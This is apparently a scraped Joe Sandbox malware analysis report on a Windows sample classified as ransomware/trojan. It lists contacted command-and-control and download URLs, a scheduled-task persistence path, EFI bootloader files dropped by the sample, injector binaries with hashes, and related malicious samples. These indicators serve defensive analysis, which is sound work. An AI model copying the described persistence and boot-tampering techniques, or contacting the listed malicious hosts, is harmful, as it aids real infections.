                    https://server2.trumops.comcsrss.exe, 0000000B.00000003.412084318.00000000118C6000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000003.412056794.00000000118BE000.00000004.00000001.sdmp, Null.11.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://grub.org)Mozilla/5.0upd.exe, csrss.exefalse
                    • Avira URL Cloud: safe
                    		low
                    http://www.everyfeed.cupd.exe, csrss.exefalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://turnitin.com/robot/crawlerinfo.html)gentracebackupd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpfalse
                      		high
                      https://trumops.comcsrss.exe, 0000000B.00000002.567045543.0000000011846000.00000004.00000001.sdmp, csrss.exe, 0000000B.00000002.566919363.0000000011804000.00000004.00000001.sdmp, Null.11.drfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://builtwith.com/biup)upd.exe, csrss.exefalse
                        		high
                        https://runmodes.com/api/log442b90d2-fde4-485f-a003-6086e2191d6e.uuid.trumops.comcsrss.exe, 0000000B.00000003.411869472.00000000118D6000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.exabot.com/go/robot)Opera/9.80upd.exe, csrss.exefalse
                        • URL Reputation: safe
                        		unknown
                        http://www.googlebot.com/bot.html)Linksupd.exe, csrss.exefalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.microsoftsvchost.exe, 0000000A.00000002.352136565.000001E387E7D000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://server2.trumops.comc=fa2e76e6e1aa03da&uuid=server2.trumops.com:443server2.trumops.com:443tcpcsrss.exe, 0000000B.00000002.568492280.0000000011A78000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 0000001F.00000003.409018705.000002A19897E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.408832984.000002A198990000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://search.msn.com/msnbot.htm)net/http:csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpfalse
                          		high
                          https://humisnee.com/sbmstart.phpindefiniteupd.exe, csrss.exefalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://gohnot.com/d28daa3fb329cff58b19acdf478b7882csrss.exe, 0000000B.00000002.568303341.00000000119AA000.00000004.00000001.sdmp, Null.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://search.msn.com/msnbot.htm)msnbot/1.1upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpfalse
                            		high
                            https://logs.trumops.comhttps://runmodes.com/api/loghttps://server2.trumops.comcsrss.exe, 0000000B.00000003.412056794.00000000118BE000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://trumops.com/api/install-failureinvalidupd.exe, csrss.exefalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.ver)svchost.exe, 0000001F.00000002.434211231.000002A198900000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		low
                            https://server2.trumops.com/api/pollEcsrss.exe, 0000000B.00000002.567910236.0000000011926000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.archive.org/details/archive.org_bot)Opera/9.80upd.exe, csrss.exefalse
                              		high
                              http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpfalse
                                		high
                                http://yandex.com/bots)Opera/9.51upd.exe, csrss.exefalse
                                  		high
                                  https://www.tiktok.com/legal/report/feedbacksvchost.exe, 0000001F.00000003.410443706.000002A1989AE000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.410486166.000002A198986000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.google.com/bot.html)Mozilla/5.0csrss.exefalse
                                    		high
                                    https://server16.trumops.com0NlSa5bf55.exe, 00000000.00000003.302106289.00000000114E2000.00000004.00000001.sdmp, 0NlSa5bf55.exe, 00000000.00000002.314895164.00000000114C0000.00000004.00000001.sdmp, 0NlSa5bf55.exe, 00000000.00000003.301759199.00000000115C2000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://gohnot.com/d28daa3fb329cff58b19acdf478b7882:s0NlSa5bf55.exe, 00000000.00000002.313848817.000000001140C000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://https://_bad_pdb_file.pdbupd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		low
                                    http://archive.org/details/archive.org_bot)Mozilla/5.0upd.exe, csrss.exefalse
                                      		high
                                      https://www.disneyplus.com/legal/privacy-policysvchost.exe, 0000001F.00000003.409018705.000002A19897E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.408832984.000002A198990000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.bloglines.com)Fupd.exe, csrss.exefalse
                                      • Avira URL Cloud: safe
                                      		low
                                      http://misc.yahoo.com.cn/heupd.exe, csrss.exefalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://newscommer.com/app/app.execsrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmptrue
                                      • URL Reputation: malware
                                      		unknown
                                      http://www.google.com/feedfetcher.html)HKLMupd.exe, csrss.exefalse
                                        		high
                                        http://crl.gupd.exe.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://blockchain.infoindexcsrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.baidu.com/search/spideupd.exe, csrss.exefalse
                                          		high
                                          http://yandex.com/bots)Opera/9.80upd.exe, csrss.exefalse
                                            		high
                                            https://disneyplus.com/legal.svchost.exe, 0000001F.00000003.409018705.000002A19897E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.408832984.000002A198990000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.tiktok.com/legal/report/svchost.exe, 0000001F.00000003.410486166.000002A198986000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://sitescore.aiValueupd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.avantbrowser.com)MOT-V9mm/00.62upd.exe, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            https://runmodes.com/api/loginvalid0NlSa5bf55.exe, 0NlSa5bf55.exe, 00000000.00000002.310849116.0000000000401000.00000040.00020000.sdmptrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            https://server2.trumops.comserver2.trumops.com:443server2.trumops.com:443tcpserver2.trumops.comacsrss.exe, 0000000B.00000002.568492280.0000000011A78000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://search.msn.com/msnbot.htm)pkcs7:upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpfalse
                                              		high
                                              http://www.alexa.com/help/webmasters;upd.exe, csrss.exefalse
                                                		high
                                                http://www.google.com/adsbot.html)Encounteredupd.exe, csrss.exefalse
                                                  		high
                                                  http://help.disneyplus.com.svchost.exe, 0000001F.00000003.409018705.000002A19897E000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000003.408832984.000002A198990000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown

                                                  Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  172.67.139.144
                                                  		server16.trumops.comUnited States
                                                  		13335CLOUDFLARENETUSfalse
                                                  104.21.92.165
                                                  		gohnot.comUnited States
                                                  		13335CLOUDFLARENETUSfalse
                                                  104.21.79.9
                                                  		server2.trumops.comUnited States
                                                  		13335CLOUDFLARENETUSfalse
                                                  172.67.207.136
                                                  		runmodes.comUnited States
                                                  		13335CLOUDFLARENETUStrue

                                                  Private

                                                  IP
                                                  192.168.2.1

                                                  General Information

                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                  Analysis ID:515565
                                                  Start date:04.11.2021
                                                  Start time:13:11:36
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 12m 59s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Sample file name:0NlSa5bf55 (renamed file extension from none to exe)
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Number of analysed new started processes analysed:49
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.rans.troj.evad.winEXE@41/15@21/5
                                                  EGA Information:Failed
                                                  HDC Information:
                                                  • Successful, ratio: 98.7% (good quality ratio 80.1%)
                                                  • Quality average: 58.5%
                                                  • Quality standard deviation: 36.8%
                                                  HCA Information:Failed
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  Warnings:
                                                  Show All
                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, csrss.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe
                                                  • TCP Packets have been reduced to 100
                                                  • Excluded IPs from analysis (whitelisted): 104.79.89.181, 23.211.6.115, 20.54.110.249, 52.251.79.25
                                                  • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, e16646.dscg.akamaiedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, storeedgefd.dsx.mp.microsoft.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  13:12:43API Interceptor9x Sleep call for process: upd.exe modified
                                                  13:13:00API Interceptor5x Sleep call for process: csrss.exe modified
                                                  13:13:08Task SchedulerRun new task: csrss path: C:\Windows\rss\csrss.exe
                                                  13:13:28API Interceptor8x Sleep call for process: svchost.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  172.67.139.144f6oNLRKHUy.exeGet hashmaliciousBrowse
                                                    jkDmft1Qoe.exeGet hashmaliciousBrowse
                                                      104.21.92.165f6oNLRKHUy.exeGet hashmaliciousBrowse
                                                      • gohnot.com/0281c43f36eb9f47aab5357d48bbc076/watchdog.exe
                                                      104.21.79.9f6oNLRKHUy.exeGet hashmaliciousBrowse
                                                        jkDmft1Qoe.exeGet hashmaliciousBrowse

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          gohnot.comf6oNLRKHUy.exeGet hashmaliciousBrowse
                                                          • 104.21.92.165
                                                          jkDmft1Qoe.exeGet hashmaliciousBrowse
                                                          • 172.67.196.11
                                                          runmodes.comf6oNLRKHUy.exeGet hashmaliciousBrowse
                                                          • 104.21.34.203

                                                          ASN

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          CLOUDFLARENETUSlRgWGfOYVQ.exeGet hashmaliciousBrowse
                                                          • 172.67.205.83
                                                          DpUlb8nrcS.exeGet hashmaliciousBrowse
                                                          • 104.21.75.57
                                                          PO#006503.pdf.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          52k0qe3yt3.dllGet hashmaliciousBrowse
                                                          • 104.20.184.68
                                                          BQIyt2B7Im.dllGet hashmaliciousBrowse
                                                          • 172.67.70.134
                                                          52k0qe3yt3.dllGet hashmaliciousBrowse
                                                          • 104.20.185.68
                                                          1H6wm3BZbJ.exeGet hashmaliciousBrowse
                                                          • 104.21.76.206
                                                          BQIyt2B7Im.dllGet hashmaliciousBrowse
                                                          • 172.67.70.134
                                                          November 3, 2021, 3%3A47%3A56 PM.HTMGet hashmaliciousBrowse
                                                          • 104.18.11.207
                                                          SayEjNMwtQ.dllGet hashmaliciousBrowse
                                                          • 104.26.6.139
                                                          bUcXB5APT3.exeGet hashmaliciousBrowse
                                                          • 162.159.129.233
                                                          uj8A47Ew7u.dllGet hashmaliciousBrowse
                                                          • 172.67.70.134
                                                          SayEjNMwtQ.dllGet hashmaliciousBrowse
                                                          • 104.26.7.139
                                                          uj8A47Ew7u.dllGet hashmaliciousBrowse
                                                          • 172.67.70.134
                                                          nowy przyk#U0142adowy katalog.exeGet hashmaliciousBrowse
                                                          • 172.67.184.156
                                                          Siparis onayi.exeGet hashmaliciousBrowse
                                                          • 162.159.133.233
                                                          11651572,pdf.exeGet hashmaliciousBrowse
                                                          • 104.21.19.200
                                                          $24,363.98.gz.exeGet hashmaliciousBrowse
                                                          • 162.159.130.233
                                                          e-Ar#U015fiv Fatura.exeGet hashmaliciousBrowse
                                                          • 162.159.133.233
                                                          doc202111036979790.exeGet hashmaliciousBrowse
                                                          • 104.21.19.200
                                                          CLOUDFLARENETUSlRgWGfOYVQ.exeGet hashmaliciousBrowse
                                                          • 172.67.205.83
                                                          DpUlb8nrcS.exeGet hashmaliciousBrowse
                                                          • 104.21.75.57
                                                          PO#006503.pdf.exeGet hashmaliciousBrowse
                                                          • 23.227.38.74
                                                          52k0qe3yt3.dllGet hashmaliciousBrowse
                                                          • 104.20.184.68
                                                          BQIyt2B7Im.dllGet hashmaliciousBrowse
                                                          • 172.67.70.134
                                                          52k0qe3yt3.dllGet hashmaliciousBrowse
                                                          • 104.20.185.68
                                                          1H6wm3BZbJ.exeGet hashmaliciousBrowse
                                                          • 104.21.76.206
                                                          BQIyt2B7Im.dllGet hashmaliciousBrowse
                                                          • 172.67.70.134
                                                          November 3, 2021, 3%3A47%3A56 PM.HTMGet hashmaliciousBrowse
                                                          • 104.18.11.207
                                                          SayEjNMwtQ.dllGet hashmaliciousBrowse
                                                          • 104.26.6.139
                                                          bUcXB5APT3.exeGet hashmaliciousBrowse
                                                          • 162.159.129.233
                                                          uj8A47Ew7u.dllGet hashmaliciousBrowse
                                                          • 172.67.70.134
                                                          SayEjNMwtQ.dllGet hashmaliciousBrowse
                                                          • 104.26.7.139
                                                          uj8A47Ew7u.dllGet hashmaliciousBrowse
                                                          • 172.67.70.134
                                                          nowy przyk#U0142adowy katalog.exeGet hashmaliciousBrowse
                                                          • 172.67.184.156
                                                          Siparis onayi.exeGet hashmaliciousBrowse
                                                          • 162.159.133.233
                                                          11651572,pdf.exeGet hashmaliciousBrowse
                                                          • 104.21.19.200
                                                          $24,363.98.gz.exeGet hashmaliciousBrowse
                                                          • 162.159.130.233
                                                          e-Ar#U015fiv Fatura.exeGet hashmaliciousBrowse
                                                          • 162.159.133.233
                                                          doc202111036979790.exeGet hashmaliciousBrowse
                                                          • 104.21.19.200

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                          B:\EFI\Boot\old.efi (copy)f6oNLRKHUy.exeGet hashmaliciousBrowse
                                                            jkDmft1Qoe.exeGet hashmaliciousBrowse
                                                              app.exeGet hashmaliciousBrowse
                                                                csrss.exeGet hashmaliciousBrowse
                                                                  csrss.exeGet hashmaliciousBrowse
                                                                    gFNUQfsbhl.exeGet hashmaliciousBrowse
                                                                      AHRwK0YGzi.exeGet hashmaliciousBrowse
                                                                        xYVQ2CgP0M.exeGet hashmaliciousBrowse
                                                                          HAZhIgUBm9.exeGet hashmaliciousBrowse
                                                                            hwvUt9M5T0.exeGet hashmaliciousBrowse
                                                                              7u479GG98a.exeGet hashmaliciousBrowse
                                                                                bjEAtgsQV8.exeGet hashmaliciousBrowse
                                                                                  bxW8vusMVJ.exeGet hashmaliciousBrowse
                                                                                    5uy2bFmu5S.exeGet hashmaliciousBrowse
                                                                                      ddscRyPcLJ.exeGet hashmaliciousBrowse
                                                                                        v1Ni5GOWI6.exeGet hashmaliciousBrowse
                                                                                          A9j7TdY8pG.exeGet hashmaliciousBrowse
                                                                                            10hORi8M8E.exeGet hashmaliciousBrowse
                                                                                              5H9JkoJNvF.exeGet hashmaliciousBrowse
                                                                                                mLvt2Sebz3.exeGet hashmaliciousBrowse

                                                                                                  Created / dropped Files

                                                                                                  B:\EFI\Boot\old.efi (copy)
                                                                                                  Process:C:\Windows\rss\csrss.exe
                                                                                                  File Type:MS-DOS executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7680
                                                                                                  Entropy (8bit):4.486535052248291
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                                                  MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                                                                  SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                                                  SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                                                                  SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Joe Sandbox View:
                                                                                                  • Filename: f6oNLRKHUy.exe, Detection: malicious, Browse
                                                                                                  • Filename: jkDmft1Qoe.exe, Detection: malicious, Browse
                                                                                                  • Filename: app.exe, Detection: malicious, Browse
                                                                                                  • Filename: csrss.exe, Detection: malicious, Browse
                                                                                                  • Filename: csrss.exe, Detection: malicious, Browse
                                                                                                  • Filename: gFNUQfsbhl.exe, Detection: malicious, Browse
                                                                                                  • Filename: AHRwK0YGzi.exe, Detection: malicious, Browse
                                                                                                  • Filename: xYVQ2CgP0M.exe, Detection: malicious, Browse
                                                                                                  • Filename: HAZhIgUBm9.exe, Detection: malicious, Browse
                                                                                                  • Filename: hwvUt9M5T0.exe, Detection: malicious, Browse
                                                                                                  • Filename: 7u479GG98a.exe, Detection: malicious, Browse
                                                                                                  • Filename: bjEAtgsQV8.exe, Detection: malicious, Browse
                                                                                                  • Filename: bxW8vusMVJ.exe, Detection: malicious, Browse
                                                                                                  • Filename: 5uy2bFmu5S.exe, Detection: malicious, Browse
                                                                                                  • Filename: ddscRyPcLJ.exe, Detection: malicious, Browse
                                                                                                  • Filename: v1Ni5GOWI6.exe, Detection: malicious, Browse
                                                                                                  • Filename: A9j7TdY8pG.exe, Detection: malicious, Browse
                                                                                                  • Filename: 10hORi8M8E.exe, Detection: malicious, Browse
                                                                                                  • Filename: 5H9JkoJNvF.exe, Detection: malicious, Browse
                                                                                                  • Filename: mLvt2Sebz3.exe, Detection: malicious, Browse
                                                                                                  Preview: MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                  B:\EFI\Microsoft\Boot\fw.efi (copy)
                                                                                                  Process:C:\Windows\rss\csrss.exe
                                                                                                  File Type:MS-DOS executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7680
                                                                                                  Entropy (8bit):4.486535052248291
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                                                  MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                                                                  SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                                                  SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                                                                  SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview: MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\EFI\Boot\EfiGuardDxe.efi
                                                                                                  Process:C:\Windows\rss\csrss.exe
                                                                                                  File Type:MS-DOS executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):279552
                                                                                                  Entropy (8bit):4.553173975914215
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:ekODsOuozgl9aXsRzZZZZrUhFapDL4k2yntc:ekeklesRD6yt
                                                                                                  MD5:2B84CB96AE6280C2020FA46E4A8A07D8
                                                                                                  SHA1:E920E40CFC0C6A805D657C8F23F9C0612CD39F59
                                                                                                  SHA-256:01E86A4DFE6E0DE7857B3CF2FAFD041C8B3A3241E00844CB6BFBD3BFAE2D36BC
                                                                                                  SHA-512:F1A6598116F78FBA1F9531301A7313AC204BAB3B7AEBC299F69F2ED406F4EDAFC3410DB860E93D0DC7C24398F5A7FF595764400F31A3A06679FD6EC0EFB116D9
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview: MZ..............................................................................................................................................................................................PE..d................." ................x........................................................................................................................P...............p.......................................................................................text.............................. ..h.data..............................@....pdata.......P.......8..............@..H.xdata..X....`.......<..............@..B.reloc.......p.......B..............@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\EFI\Boot\bootx64.efi
                                                                                                  Process:C:\Windows\rss\csrss.exe
                                                                                                  File Type:MS-DOS executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7680
                                                                                                  Entropy (8bit):4.486535052248291
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                                                  MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                                                                  SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                                                  SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                                                                  SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview: MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\EFI\Microsoft\Boot\bootmgfw.efi
                                                                                                  Process:C:\Windows\rss\csrss.exe
                                                                                                  File Type:MS-DOS executable
                                                                                                  Category:dropped
                                                                                                  Size (bytes):7680
                                                                                                  Entropy (8bit):4.486535052248291
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                                                  MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                                                                  SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                                                  SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                                                                  SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                                                  Malicious:false
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                  Preview: MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                                                                  Process:C:\Windows\rss\csrss.exe
                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                  Category:modified
                                                                                                  Size (bytes):101376
                                                                                                  Entropy (8bit):5.951577458824018
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:U3JJpaHtGsxJZ7zmaUMf2ETb4w1GMYbuT:csTF5U3EfndT
                                                                                                  MD5:09031A062610D77D685C9934318B4170
                                                                                                  SHA1:880F744184E7774F3D14C1BB857E21CC7FE89A6D
                                                                                                  SHA-256:778BD69AF403DF3C4E074C31B3850D71BF0E64524BEA4272A802CA9520B379DD
                                                                                                  SHA-512:9A276E1F0F55D35F2BF38EB093464F7065BDD30A660E6D1C62EED5E76D1FB2201567B89D9AE65D2D89DC99B142159E36FB73BE8D5E08252A975D50544A7CDA27
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Metadefender, Detection: 46%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 59%
                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b..............k......k......k..r...w......w......w......k............. w...... w...... w......Rich............PE..d...o.D`.........." ................$/....................................................`..................................................g..(...............p...............<....W..8...........................@W..8............................................text............................... ..`.rdata.............................@..@.data................d..............@....pdata..p............p..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..<...........................@..B................................................................................................................................................................................................................
                                                                                                  C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
                                                                                                  Process:C:\Windows\rss\csrss.exe
                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):288256
                                                                                                  Entropy (8bit):6.31266455792162
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:qbHszDaOJ8u2HHFIWr6e29kOnK7qFQ8wMii5I7kGvNjzMuszHshoY46bEydJ+dK9:SA3IlIA6e29vngqS8wMmuooh8z+8F
                                                                                                  MD5:D98E33B66343E7C96158444127A117F6
                                                                                                  SHA1:BB716C5509A2BF345C6C1152F6E3E1452D39D50D
                                                                                                  SHA-256:5DE4E2B07A26102FE527606CE5DA1D5A4B938967C9D380A3C5FE86E2E34AAAF1
                                                                                                  SHA-512:705275E4A1BA8205EB799A8CF1737BC8BA686925E52C9198A6060A7ABEEE65552A85B814AC494A4B975D496A63BE285F19A6265550585F2FC85824C42D7EFAB5
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                  • Antivirus: Metadefender, Detection: 14%, Browse
                                                                                                  • Antivirus: ReversingLabs, Detection: 73%
